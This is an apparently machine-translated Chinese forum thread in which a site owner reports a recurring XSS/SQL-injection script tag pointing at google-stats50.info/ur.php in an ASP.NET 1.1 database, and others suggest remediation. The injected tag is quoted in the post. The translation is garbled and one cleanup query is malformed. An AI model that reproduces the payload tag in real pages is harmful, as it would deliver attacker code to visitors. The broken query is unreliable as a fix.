我遇到了很大的麻烦。请帮忙!!!!!!!!!!XSS攻击ASP.NET网站
我的网站遭到了一些恶意脚本的攻击</title> < script src = http:// google-stats50.info/ur.php>。该脚本会自动附加到某个表的任何列。我已经删除了这个脚本。但几个小时后,它重新出现在一些表格中。但是这次是</title> <脚本src = http:// google-stats49.info/ur.php>。
我的客户抱怨脚本。使用的技术是ASP.NET 1.1,SQL SERVER 2005.
请帮忙。
在此先感谢!!!!!!
关闭该网站。您的服务器现在可能已经或可能不会被拧紧。
你必须找出变化的来源 - 数据库或文件系统
如果它的数据库,那么你可能是好的,有人可能使用SQL注入。设置权限,以便现在无法由站点更新数据库,直到找到SQL INJECTION点。
如果它是您的文件系统,那么您可能需要清除并重置网站。他们在,你不会摆脱他们。找到你的切入点,但它会很难。
当您从数据库渲染文本时,可以使用两种方法来避免此脚本。
Last MS Anti-XSS library now是3.1。
How to using video
他们是如何通过这个脚本的。
希望得到这个帮助。
好的..谢谢.....我会在我的应用程序中实施这些预防措施。但是有没有快速解决方案来删除脚本? – user423719 2010-09-23 07:49:51
我不知道他们是如何传递这个脚本并将它注入数据库的。 – user423719 2010-09-23 07:53:08
@ user423719我在回答中键入了2种可能的方式,从联系表单或您登录的浏览器数据注入。不要删除脚本,只是让它不能运行,然后找到如何输入,如果你喜欢,你可以制定更多的措施。 – Aristos 2010-09-23 08:05:58
我建议您在IIS中删除所有extern hostheader绑定。这使您可以在本地查找问题,没有任何客户端的你可能感染/从
的快速补救
继被盗是不是一个解决方案,但有了这个,你可以在从数据库中删除脚本单个查询。那就是我现在所做的:)。
UPDATE TABLE_NAME SET COLUMN_NAME = REPLACE(CAST(列名AS为nvarchar(MAX)),“http://google-stats49.info/ur。'>')
这一个工作就像查找和替换字中的东西。如果您发现任何关于病毒脚本的东西,请在此处发布。
问候, 马苏德
嗨,大家好,有另一个注入链接。看起来这个是由同一个机器人注入的。不能发布链接在这里。 – 2010-09-25 07:19:41
它再次出现。我已经在Web.config文件中加密了敏感信息。我认为它停止了脚本重新出现大约24小时。但它又一次出现了。请帮忙。 – user423719 2010-09-29 07:14:04
同样在这里的问题...它开始约15.30和感染4桌......这里是完整的数据库搜索解决方案:http://justgeeks.blogspot.com/2006/10/search-ms-sql-server-for-any-text.html只需编辑它返回不同的表名。
,这将作为马苏德提
UPDATE Table_Name SET Column_Name = REPLACE(CAST(Column_Name AS nvarchar(MAX)), 'stupid script', '')
另外,尽量消毒(不允许HTML/JS)用户输入。 – sheeks06 2010-09-23 06:52:17
我们通过脚本技术加载第三方网站上的内容...这就是我的网站的目的....是否有办法尽快解决它 – user423719 2010-09-23 07:10:29
现在可能太晚了,但如果像这样的事情发生并且很快,通常需要聘请专家。一位非常昂贵的专家。 – Dann 2010-10-06 12:30:28